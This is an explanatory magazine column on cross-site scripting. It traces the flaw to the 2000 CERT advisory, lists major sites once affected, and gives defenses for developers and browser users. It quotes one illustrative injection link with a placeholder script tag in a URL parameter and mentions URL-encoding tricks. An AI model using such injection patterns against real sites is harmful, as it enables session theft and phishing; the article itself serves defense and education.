How to defeat the new No. 1 security threat: cross-site scripting

Cross-site scripting, often abbreviated XSS, is a class of Web security issues. A recent research report stated that XSS is now the top security risk.

In a typical XSS scenario, a Web page might use JavaScript to dynamically generate some document content based on a field in a Uniform Resource Identifier (URI). In the normal course of events, the site itself would generate legitimate information for that field.

If, however, the script that generated the new content did not filter the URI, it would be possible for an attacker to feed the page a custom-designed URI that ran a script. The script could do almost anything, and the user would never know that he wasn't seeing legitimate content unless the hijacker was blatant.

This is potentially very bad, since it is one way to enable phishing. For example, suppose a Web page with a cross-site scripting vulnerability belonged to a bank. An attacker aware of the vulnerability could forge e-mails purporting to be from the bank, with URIs that indeed led to the bank's site, but contained some malicious script that wouldn't be obvious to a casual observer. Once a user clicked on the link in the e-mail and logged into the bank site, their login credentials (in the form of cookies) for the current session would be transmitted to the attacker, who would be able to take over the user's account as long as the session was active.

This is considerably worse than an attack that takes users to a forged Web page, because it can, in principle, bypass most forms of authentication protection. After all, it's using the bank's own authentication system, and then hijacking the results. David Flanagan, author of JavaScript: The Definitive Guide, says cross-site scripting "enables a pernicious vulnerability whose roots go deep into the architecture of the Web."

Some history

Cross-site scripting first received wide notice in February 2000, when CERT® Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests was published. The original summary was:

"A Web site may inadvertently include malicious HTML tags or script in a dynamically generated page based on unvalidated input from untrustworthy sources. This can be a problem when a Web server does not adequately ensure that generated pages are properly encoded to prevent unintended execution of scripts, and when input is not validated to prevent malicious HTML from being presented to the user."

The systems affected were listed as "Web browsers" and "Web servers that dynamically generate pages based on unvalidated input."

One XSS example given in the original CERT advisory is this link:

<AHREF="http://example.com/comment.cgi?mycomment=<SCRIPT>malicious code</SCRIPT>"> Click here</A>

Looking back at this example from the perspective of six years of dealing with XSS and malicious spammers, it seems a bit naïve. After all, only a user who didn't bother to look at the link destination could be tricked into clicking on such a link. The presence of the tag "<SCRIPT>" would be enough to tip off a sophisticated user, as would the presence of other HTML, such as a "<FORM>" tag, that could be perverted to run scripts.

However, even a sophisticated user might be fooled if the script tag and malicious code were encoded. Attackers use tricks like encoding angle brackets as %3C, constructing unreadable numeric IP addresses, using alternate character sets and so on. The safest policy for a user is, of course, never to click on links from untrusted sources.

The original CERT advisory went on to explain the impact of cross-site scripting. It was, and is, chilling stuff. XSS creates the potential for attackers to force malicious actions on trusted servers, even on SSL-Encrypted servers. Even using a browser that lacks scripting support is not a foolproof solution, because attackers can still "alter the appearance of a page, modify its behavior or otherwise interfere with normal operation."

It isn't even necessarily over after the first attack. Once malicious code has been executed, the attacker can place a modified or "poisoned" cookie on the victim's computer that compromises every future visit to the affected site. In even more dangerous exploits, the attacker can modify the victim's browser security policies, allowing the attacker to elevate his privilege on the victim's machine, potentially doing more serious damage or gaining access to valuable local information, such as additional stored passwords.

Sites that have had XSS vulnerabilities

You'd think that cross-site scripting would be restricted to sites designed and administered by the unsophisticated, and that once you got beyond mom-and-pop e-commerce sites, you'd be free of the problem. You'd be wrong; even very sophisticated, security-conscious sites have had XSS vulnerabilities.

As I have found by regular reading of security sites like the SANS Institute's Internet Storm Center, their Top 20 Most Critical Internet Security Vulnerabilities page, Microsoft's security home page, and Brian Krebs' Washington Post security blog (see for example, the entry Cross-Site Scripting Flaws Abound), cross-site scripting vulnerabilities have affected most browsers, many content management systems and many high-profile sites.

It's bad enough to find XSS vulnerabilities on eBay or Amazon, which are constant targets of spammers and crackers. But would you believe an XSS vulnerability on the National Security Agency's site, www.nsa.gov? On Verisign.com, one of the root certificate authorities for the Web? Visa.com? JPMorganChase.com? Nyse.com? Amex.com? They happened.

How Web sites can avoid XSS vulnerabilities

The original CERT advisory offered this advice to Web developers, as true today as it was in 2000: "Web Page Developers Should Recode Dynamically Generated Pages to Validate Output." The article goes on to explain that it isn't enough just to filter out "<", "&" and ">" characters: CERT encourages developers to "restrict variables used in the construction of pages to those characters that are explicitly allowed and to check those variables during the generation of the output page. In addition, Web pages should explicitly set a character set to an appropriate value in all dynamically generated pages."

In support of this, because it's such as complicated subject, CERT offers a document full of guidelines for malicious code mitigation, which offers sample filtering code in C++, JavaScript and Perl, plus sample HTML for setting the character set.

CERT also advised Web server administrators to apply a patch from their vendor. The singular "a patch" seems wildly funny in hindsight: I have lost track of the many patches to XSS vulnerabilities that have been issued over the years to every Web server and operating system. To paraphrase Jefferson, the price of site security is constant vigilance.

How consumers can repel XSS attacks

The original CERT advisory said that users should either disable scripting in their browser, or, if unwilling to do that, "Not Engage in Promiscuous Browsing." That, too, sounds wildly funny in hindsight, but the additional information given at the time still holds. The emphases are mine:

"Since the most significant variations of this vulnerability involve cross-site scripting (the insertion of tags into another site's Web page), users can gain some protection by being selective about how they initially visit a Web site. Typing addresses directly into the browser (or using securely stored local bookmarks) is likely to be the safest way of connecting to a site.

"Users should be aware that even links to unimportant sites may expose other local systems on the network if the client's system resides behind a firewall, or if the client has cached credentials to access other Web servers (e.g., for an intranet). For this reason, cautious Web browsing is not a comparable substitute for disabling scripting.

"With scripting enabled, visual inspection of links does not protect users from following malicious links, since the attacker's Web site may use a script to misrepresent the links in the user's window. For example, the contents of the Goto and Status bars in Netscape are controllable by JavaScript."

In the intervening years, several products have attempted to help protect users from XSS attacks. I have tried and discarded half a dozen antiphishing toolbars. So far, every one I have tried had more false positives than true warnings. Krebs recommends the Netcraft Anti-Phishing Toolbar, which is available free for Internet Explorer and Firefox. It appears to be useful, but I have no idea whether it will turn out to be any better than the toolbars I have already dumped.

Krebs also recommends the NoScript extension for Firefox. According to the download site, this tool "allows JavaScript, Java and other executable content only for trusted domains of your choice, e.g., your home banking Web site." In principle, a white list approach to scripting should give you fairly good protection against unknown threats, but if your trusted home banking Web site is compromised by a cross-site scripting attack after you've white listed it, all bets are off.

Judicious use of security zones can accomplish much the same results. If you set your browser's security policy to only turn on scripting for trusted sites, and truly screen your trusted sites, you get accomplish most of what the NoScript extension for Firefox can give you, even on Internet Explorer.

Ultimately, the best approach to any security threat is to defend in-depth. By all means, turn off scripting for unknown sites. And run a toolbar that warns you about phishing. At the same time, try to type in site addresses yourself rather than indiscriminately clicking on links sent to you in e-mails, even if they come from well-meaning friends.

Martin Heller develops software and Web sites, and writes from Andover, Mass. Reach Martin at cw@mheller.com.

5 collaboration tools that enhance Microsoft Office
  
Shop Tech Products at Amazon